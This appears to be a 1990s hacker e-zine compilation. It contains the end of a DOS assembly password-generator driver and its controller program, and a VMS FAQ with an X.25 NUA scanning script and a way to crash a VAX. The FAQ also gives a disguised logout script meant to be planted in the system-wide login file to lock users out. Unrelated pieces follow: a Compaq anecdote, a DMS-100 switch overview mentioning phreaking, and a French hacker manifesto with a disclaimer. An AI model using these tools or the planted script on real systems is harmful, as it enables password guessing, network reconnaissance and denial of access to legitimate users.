call inc_num





is_okay:

mov [countr],si

mov di,es:[bx]+0eh

mov ax,es:[bx]+010h

mov cx, es:[bx]+012h

jcxz clean_up

mov es,ax

repe movsb



clean_up:

pop bx

pop es

jmp exit2





exit3: mov es:word ptr 3[bx],08103h

jmp exit1



exit2:

mov es:word ptr 3[bx],0100h



exit1:

pop si

pop di

pop dx

pop cx

pop bx

pop ax

pop es

pop ds

popf

retf

exit:



inc_num proc near

 push si

 mov si,numsize



 reiterate:

  inc byte ptr [number+si]

  cmp byte ptr [number+si],'z'+1    ;+1 past ending char. in range

  jnz _exit

  mov byte ptr [number+si],'a'      ;starting char. in range

  dec si

  cmp si,-1

  jnz reiterate

  mov byte ptr [number],01ah        ;send EOF

 _exit:

  pop si

  ret

inc_num endp







at_eof:                        ; the non-resident code starts here



initial proc near

push es



push cs

pop ds



push cs

pop es



mov si,offset number

mov di,offset tmpnum

cld

_again:

lodsb

cmp al,0ah

jz _nomorechars

stosb

jmp _again



_nomorechars:

mov si,offset msgend

mov cx,4

repe movsb



mov ah,09             ;print welcome message

mov dx,offset msg1

int 21h



pop es

ret

initial endp



init: call initial

mov ax,offset at_eof

mov es:[bx]+0eh,ax

push cs

pop ax

mov es:[bx]+010h,ax

mov cs:word ptr cmdtab,offset exit3

jmp exit2





msg1    db "Incremental Password Generator (c)1995",0ah,0dh

        db "Written by Uncle Armpit",0ah,0dh,0ah,0dh

        db "Starting at word ["

tmpnum  db 10 dup (?)

msgend  db "]",0a,0d,'$'

;END hackdrv.sys



;------------------------------cut here----------------------------------



;PROGRAM modpwd.asm

;

org 0100h

mov ax,03d02h

xor cx,cx

mov dx,offset devname

int 21h

jnc drvr_found



mov ah,09

mov dx,offset no_drvr

int 21h

jmp error_pass





drvr_found:

mov bx,ax

mov ax,04402h

mov cx,20                   ;read 20 characters

mov dx,offset databuffr

int 21h



mov pass_len,al

dec al

mov ah,al

and al,0fh

mov cl,4

shr ah,cl

add ax,03030h

cmp al,'9'

jbe inrange

add al,7

inrange:

cmp ah,'9'

jbe inrange1

add ah,7

inrange1:

mov byte ptr [num_chr],ah

mov byte ptr [num_chr+1],al





cld

mov di,offset databuffr-1

xor cx,cx

mov cl,pass_len

add di,cx

mov si,offset pass_end

mov cx,stringsz

repe movsb



;check for information in command line

;else--> prompt for user input

mov al,pass_len

or byte ptr [0080h],0

jz req_input

mov cl,[0080h]

dec cl

mov [0081h],cl

mov si,0081h

mov di,offset newpass

mov cx,20

repe movsb

jmp vrfy_info



req_input:

mov ah,09

mov dx,offset cur_pass

int 21h



mov ah,0a

mov dx,offset pass_len

int 21h





vrfy_info:

mov ax,word ptr [pass_len]

cmp ah,0

jz error_pass

dec al

cmp ah,al

jnz error_len



;change the current password

xor cx,cx

mov cl,al

mov ah,044h

mov al,03

mov dx,offset newpass+1

int 21h

jnc success_pass



error_len:

mov ah,09

mov dx,offset errormsg

int 21h



error_pass:

mov ax,04c01h                     ;abnormal termination

int 21h



success_pass:

mov ax,04c00h

int 21h





devhandle  dw ?

cur_pass   db 'Current password is ['

databuffr  db 20 dup (?)

pass_end   db ']      ;'

num_chr    db '  '

           db ' characters',0ah,0dh,0ah,0dh

prompt     db 'New word: ','$'

stringsz  equ $ - pass_end



pass_len   db 00

newpass    db 20 dup (?)

errormsg   db 'error changing password!',0ah,0dh,'$'

no_drvr    db 'Error: '

devname    db "HACKPWD ",00

           db 'device driver not loaded!',0ah,0dh,07,'$'





------------------------------------------------------------------------------



         -- Frequently & Rarely asked questions about VMS -- part one

        by Opticon the Disassembled - UPi



[1]



 " I have a kropotkin.hlp file. What could I possibly do with it ? "



$ library /insert /help sys$help:helplib.hlb kropotkin.hlp

.

.

.

$ help kropotkin



[2]



 " I have a bakunin.tlb file. What to do with it ? "



$ library /extract=(*) bakunin.tlb

.

.

.

$ dir



[3]



 " I would like to have a look at prunton.dat. "



$ dump [/block=(count:x)] prunton.dat



Where "x" is the number of blocks DUMP will display.



[4]



 " How can I use an external editor with mail ? "



$ mail :== mail /edit=(send,reply=extract,forward)



[5]



 " How a HELP file is organized ? "



$ create example.hlp

1 EXAMPLE



  THIS IS AN EXAMPLE.



2 MORE_EXAMPLES



  MORE EXAMPLES.



3 EVEN_MORE_EXAMPLES



  EVEN MORE EXAMPLES.





[6]



 " How can I have a look at queues ? "



$ show queue smtp /all/full



or



$ show queue /batch/all/full



or



$ show queue /all/full



[7]



 " My mail is holded, for some reason, in the SMTP queue... "



Either



$ delete /entry=XXX



or



$ set entry XXX /release



in order to force VMS to release it right away.



[8]



 " How do I have a look at DTE and circuits available. "



$ mc ncp show known dte



and



$ mc ncp show known circuits



You may also may find of interest:



$ mc ncp show known networks



$ mc ncp show known lines



$ mc ncp show known destinations



[9]



 " I need a NUA scanner for VMS. "



$ OPEN/READ VALUES SCAN.VAL

$ READ VALUES PRE

$ READ VALUES DTE

$ READ VALUES END

$ CLOSE VALUES

$ LOG = "SCAN.LIS"

$ TMP = "SCAN.TMP"

$ OPEN/WRITE FILE 'LOG

$ WRITE FILE "PREFIX:",PRE

$ WRITE FILE "START :",DTE

$ WRITE FILE "LAST  :",END

$LOOP:

$ ON ERROR THEN GOTO OPEN

$ SPAWN/NOWAIT/OUTPUT='TMP' SET HOST/X29 'PRE''DTE'

$ WAIT 00:00:06

$ SPAWN_NAME = F$GETJPI("","USERNAME")

$ SPAWN_NAME = F$EXTRACT(0,F$LOC(" ",SPAWN_NAME),SPAWN_NAME) + "_"

$ CONTEXT = ""

$FIND_PROC:

$ PID = F$PID(CONTEXT)

$ IF PID .EQS. "" THEN GOTO OPEN

$ IF F$LOC(SPAWN_NAME,F$GETJPI(PID,"PRCNAM")) .EQ. 0 THEN STOP/ID='PID

$ GOTO FIND_PROC

$OPEN:

$ ON ERROR THEN GOTO OPEN

$ OPEN/READ PAD 'TMP

$ MSSG = " Process stopped"

$ ON ERROR THEN GOTO CLOSE

$ READ PAD LINE

$ IF F$LOC("call clear",LINE) .LT. F$LEN(LINE) THEN READ PAD LINE

$ MSSG = F$EXTRACT(F$LOC(",",LINE)+1,80,LINE)

$CLOSE:

$ CLOSE PAD

$ DELETE 'TMP';*

$ IF F$LOC("obtain",MSSG).NE.F$LENGTH(MSSG) THEN GOTO NOCONN

$ WRITE FILE PRE,DTE,MSSG

$NOCONN:

$ DTE = DTE + 1

$ IF DTE .LE. END THEN GOTO LOOP

$ CLOSE FILE



( I don't have a clue by whom the code was written. )



then



$ create scan.val

prefix

starting_NUA

ending_NUA



$ submit /noprint scan.com

.

.

.

$ search scan.lis "call connected"



[10]



 " How do I crash a VAX !? "



$ set default sys$system

$ @shutdown



or



$ set default sys$system

$ run opccrash



[11]



 " I have a dostogiefski.cld file; what do I do with it ? "



$ set command dostogiefski.cld



[12]



 " Can I send messages to interactive processes ? "



$ reply [/user=username] [/bell] [/id=xxxx] " Carlos Marigella "



[13]



 " How can I prevent someone from phoning me all the time ? "



$ set broadcast=(nophone)



[14]



 " Can I postpone/disable interactive logins ? "



$ set logins /interactive=0



$ set logins /interactive



will display current value.



Under the same `logic' :



$ create innocent_filename.com

$ set nocontrol

$ context = ""

$ pid = F$PID(context)

$ user_name = F$GETJPI(pid,"username")

$ wait 00:01:00.00

$ write sys$output ""

$ write sys$output " System overloaded; please try again later "

$ write sys$output " Logging out process ''pid', of user ''user_name' "

$ write sys$output ""

$ logout /full



Add either to sys$system:sylogin.com or sys$login:login.com the following:

" $ @innocent_filename.com ".



[15]



 " How can I modify the welcome file ? Where is it held ? "



$ set default sys$system

$ edit welcome.txt



[16]



 " I am editing a huge text file. How can I reach the end of it ? "



at the editor's prompt type:



*find end



or



*find "search string"



[17]



   " How can I be sure than noone is watching me from a hidden process ? "



$ show system /process

VAX/VMS V5.5-2  on node STIRNER  30-MAR-1937 02:10:41.94   Uptime  2 03:05:25

  Pid    Process Name    State  Pri      I/O       CPU       Page flts Ph.Mem

.

.

.

00000114 SYMBIONT_4      HIB      5      290   0 00:00:19.05      1650     47

00000117 SMTP_SYMBIONT   HIB      4    33398   0 00:16:49.67    246104    426

00000118 SYMBIONT_6      HIB      4    47868   0 00:05:09.01       296    121

00001255 SYMBIONT_0001   CUR 13  15    64293   0 00:05:08.12      1982    248



$ show system /full



VAX/VMS V5.5-2  on node STIRNER  30-MAR-1937 02:10:59.64   Uptime  2 03:05:43

  Pid    Process Name    State  Pri      I/O       CPU       Page flts Ph.Mem

.

.

.

00000114 SYMBIONT_4      HIB      5      290   0 00:00:19.05      1650     47

         [1,4]

00000117 SMTP_SYMBIONT   LEF      5    33407   0 00:16:49.78    246116    502

         [1,4]

00000118 SYMBIONT_6      HIB      5    47872   0 00:05:09.03       296    121

         [1,4]

00001255 SYMBIONT_0001   CUR 13  15    64348   0 00:05:09.60      2063    268

         [1,4]

$



 See the difference between system's SYMBIONT processes ( i.e. SYMBIONT_4,

 SYMBIONT_6, SMTP_SYMBIONT ) and the one created by using a `stealth' program

 ( SYMBIONT_0001 ); the names and the User Identification Codes may vary, but

 state, priority, physical memory used, page faults, input/output and Process

 IDentification numbers, can reveal, in combination, such a nastyness.



 Afterwards you may " show process /id=xxxx /continuous ",

 or " stop /id=xxxx ".



[18]



   " Can I view the CPU usage of each process ? "



$ monitor processes /topcpu



will display a bar-chart of this kind.



[19]



   Run the following .COM file and it will display information you'd

 possibly need on an account and/or node. It uses simple lexical functions.



$ output :== write sys$output

$ output ""

$ node_id = F$CSID(context)

$ nodename = F$GETSYI("nodename",,node_id)

$ if F$GETSYI("cluster_member") .EQS. "TRUE"

$ then output " ''nodename' is a member of a cluster. "

$ else output " ''nodename' is not a member of a cluster. "

$ context = ""

$ username = F$GETJPI("","username")

$ output " Username : ''username' "

$ group = F$GETJPI("","grp")

$ output " Group : ''group' "

$ uic = F$USER()

$ output " User Identification Code : ''uic' "

$ pid = F$PID(context)

$ output " Process IDentification : ''pid' "

$ process = F$PROCESS()

$ output " Process Name : ''process' "

$ terminal = F$GETJPI("","terminal")

$ output " Terminal Name : ''terminal' "

$ priority = F$GETJPI("","authpri")

$ output " Authorized Priority : ''priority' "

$ maxjobs = F$GETJPI("","maxjobs")

$ output " Maximum Number of Processes Allowed : ''maxjobs' "

$ authpriv = F$GETJPI("","authpriv")

$ output " Authorized Privileges : ''authpriv' "

$ curpriv = F$GETJPI("","curpriv")

$ output " Current Privileges : ''curpriv' "

$ directory = F$DIRECTORY()

$ output " Directory : ''directory' "

$ protection = F$ENVIRONMENT("protection")

$ output " Protection : ''protection' "

$ boottime = F$GETSYI("boottime")

$ output " Boot Time : ''boottime' "

$ time = F$TIME()

$ output " Current Time : ''time' "

$ version = F$GETSYI("version")

$ output " VMS version : ''version' "

$ output ""



 You may :



$ library /extract=(lexicals) /output=lexicals.hlp sys$help:helplib.hlb



and then transfer lexicals.hlp.



[20]



    " How can I view/modify my disk quota limit ? "



 DiskQuota was a standalone utility in versions prior to five; It is now

 a subset of the System Management utility, and thus you should :



$ set def sys$system

$ run sysman

SYSMAN> diskquota show /device=dua1: [1,1]

%SYSMAN-I-QUOTA, disk quota statistics on device DUA1: --

Node

     UIC                  Usage        Permanent Quota   Overdraft Limit

[1,1]                     123456       1500000           100



SYSMAN> diskquota modify /device=dua1: [1,1] /permquota=654321 /overdraft=1000



[END]



   Post Scriptum



   Some operations require privileges.





------------------------------------------------------------------------------



Compaq CEO blunders on TV



          Compaq CEO Eckard Pfeiffer last week visited The Netherlands

          to do some pr work. During a television interview for NOVA,

          a well known news show that aired last Friday, Pfeiffer

          claimed that pc's were easy to use, and could be used by

          virtually anyone. So, the reporter asked him to switch the

          tv channel on a Presario that was next to Pfeiffer that ran

          a Windows-based TV tuner. The result was Pfeifer frantically

          clicking on several menu bars, but instead of switching

          channels, he exited the program altogether. To make things

          worse, the reporter next asked him to start up a word

          processor.  Again, Pfeiffer, clicked his way around the

          desktop, but couldn't find nor start the program. Finally,

          he was asked to start up a game. You saw Pfeifer (now in

          deep trouble) clicking on all the tabs of the "easy to use"

          tab-works interface that is included on all Presario's,

          looking for games, while muttering "Were are ze games? I

          can't find ze games on zis machine!!!", his accent becoming

          increasingly more German then before. It was almost like Dr.

          Strangelove. The last shot is of a Compaq tech support guy,

          rushing in to help him out....  So much for ease of use....



Voorburgwal 129, 1012 EP

Amsterdam, The Netherlands).



------------------------------------------------------------------------------



Ok, I'm going to assume that you already know a little bit about what it

is you're reading.  The DMS100/IBN (integrated business network) is

composed of mainly electronic business sets, phones, data units, and

attendant consoles and units, all physically at the customers place of

business.  While the digital switching software and support hardware is

located at the Telco.  Together, in tandem they work to give the customer

one of the best combinations of features and benefits.  The DMS-100

combines voice AND data in one business comunications package.  One of

the many advantages is it offers the use with *any* sized business with

up to 30,000 lines.  The IBN system controls most operations, diagnoses

problems, and also has the ability to do limited repairs on itself.

Being modular, it can meet the needs at hand, and have the ability for

new features, as time goes by, while still maintaining a cost-effective

environment.  Another advantage is that is uses a central attendant where

and when needed.  Along with Call Routing, or CDR, to control and

restrict Long Distnace Calling, and network management.  The IBN gives

the user hassle free operation.  Northern Telcom's DMS-100 switches,

which by the way are digital, are frequently backed-up by their

*higher trained* personnel, which isnt saying much.  Some other features

are: Automatic Routing Selection, or ARS, which routes the long distance

calls, if they are even allowed, over the most economical (right) route

available.  Station Message Detail Recording, or SMDR, which basically

does just what its name states, records long distance charges, including

but not limited to, originating number, time and length of call,

authorization code, and others...  Yet another capability is the Direct

Inward System Access (DISA), which gives the personnel the ability to use

the system to place long distance calls cheaply, even from outside the

company (sounds like a PBX a bit doesn't it?).

System Features and Benefits:  There are 6 Call Waiting Lamp Loop Keys,

each with its associated source AND destination lamp to signify the

status of both the calling and the called party status.  The Second

feature is Alpha Numeric Display Multiple Directory Number Feature Keys,

up to 42 of them, which can be used for a Paging System, or speed

dialing, and things along those lines.  A third feature is the release

Source/Release Destination Console, which features access to paging.

Other features which mainly are unimportant I will list here, they are:

Call Identifier Exclude Source/Exclude Destination.  Remote Console Call

Destination.  Signal Source.Signal Destination.  Call Holding.  Call

Detail Entry.  Remote Console Call Selection.  Console Display.  Camp-on

Automatic Recall Conference.  A 6 port 2 way splitting non-delayed

operation.  Busy Verification of Lines.  Manual and Automatic Hold.

Multiple Console OPeration.  Busy verification of trunks. Switched Loop

Operation.  Trunk Group Busy Indication.  Uniform Call distribution form

queue.  Multiple listed directory numbers.  Control of trunk group

access.  Secrecy.  Night Service.  Serial call.  Speed Calling.  Lockout.

 Delayed Operation.  Position Busy.  Interposition Calling.  THrough Call

Pickup.  RIng Again.  Multiple Directory Numbers.  Intercom.  Speed

Call.  Call Transfer/Conference.  On-Hook Dialing.  Additional

Programmable Features include automatic hold.  Listem-on hold.  Multiple

Appearance Directory Numbers, or MADN.  Single Call Arrangement.

Multiple Call Arrangement.  Privacy Release.  Tone Ringing with Volume

Control.  Call Waiting.  Stored Number Redial.  Private Business Line.

And Finally a 32 character alphanumeric data unit.  The DMS100/IBN can be

used as a "standalone" or can be attached to the business set or other

phone type unit.  It has the ability to transmit over a two wire loop, at

speeds of up to 56 kb per second, using a proprietary time compression

multiplexing technology.  The DMS100 is also available in different

models to suit existing terminal capacities.  It also provides integrated

voice/data, that right data, communications.  They, the phone company,

and data unit, can operate together, simultaniously, or even independant

of one another.  Being fully digitized, it was one if the first switches

to eliminate the use of those dinosaur analog modems (for which i still

have a few if anyone wants to buy em off me or give me shipping money and

ill send em to ya free).  Well thats it for now.  This should give you a

good understanding of the capabilities of one of the many switches in use

today.  In fact, although outdated somewhat, my telco, citizens

utilities, and one in stockton from what i just found out, is still using

this switch (poor me in elk grove, ca eh?)

which makes phreaking quite an easy task, not that it was really ever

hard but anything to make it easier help.  ANyway, if you have any

comments/flames/general bullshit, mail it to either

jmatrix@mindvox.phantom.com or capthook@sekurity.com the latter being a

last resort email address.

ciao

                                             ---Captain Hook



------------------------------------------------------------------------------



Manifest
Le but de ce site est de mieux comprendre la sécurité informatique.
Un hacker par définition est une personne qui cherche à améliorer les systèmes d'information dans le seul et unique but de contribuer à la stabilité de ces systèmes!
La croyance populaire laisse entendre que les hackers sont des pirates.
C'est vrai. Mais il y a différents types de pirate.
Tout comme il y a différents types de personnes.
Les bavures courantes auxquelles on pense lorsqu'on évoque le terme de pirate informatique
seraient les hacks de compte msn, ordinateurs lâchement trojantés avec des exploits déjà tous faits
et encore peut-on classifier en tant que hack le fait de spammer
alors que depuis plus de 15 ans des scripts tous faits le font extrêmement bien?

Ce ne sont pas des hackers qui font ça!!!
Nous appelons ces gens des lammers! Quand ils sont mauvais,
ou des black hat lorsqu'ils sont doués dans la mise en application de leurs méfaits.
Aucun amour propre - Aucune dignité
Agissent par dégout, vengeance ou simple plaisir.
Les raisons peuvent être nombreuses et je ne prétends pas devoir juger qui que ce soit.
Je pense juste que l'on ne doit pas utiliser l'épée de fly pour commettre des injustices.
Il est 100 fois plus profitable d'améliorer un système que de marcher sur un château de sable... même si marcher sur un château de sable est rigolo :P
A vous de trouver votre amusement. ;)

Tu peux réagir sur la shootbox


Disclaimer Veuillez lire obligatoirement les règles ci-dessous avant de consulter ce site.
Conformément aux dispositions des différentes lois en vigueur, intrusions et maintenances frauduleuses sur un site, vol et / ou falsification de données.
Vous ne devez en aucun cas mettre en application les stratagèmes mis en place par ce site, qui sont présentés uniquement à titre d’éducation et de recherche dans le domaine de la protection de données.
Vous ne devez en aucun cas utiliser ce que vous aurez découvert, sauf si vous avez une autorisation écrite de l’administrateur d’un site ou que celui-ci vous ai ouvert un compte uniquement pour la recherche de failles.
Tout cela est interdit et illégal ne faites pas n'importe quoi.
Vous acceptez donc que l'administrateur de ce site n'est en aucun cas responsable d'aucun de vos actes. Sinon quittez ce site.
Vous êtes soumis à ce disclaimer.
ET À CE TITRE, NI LA COMMUNAUTÉ, NI L'ADMINISTRATEUR, NI L'HÉBERGEUR, NE POURRONT, NI NE SERONT RESPONSABLE DE VOS ACTES.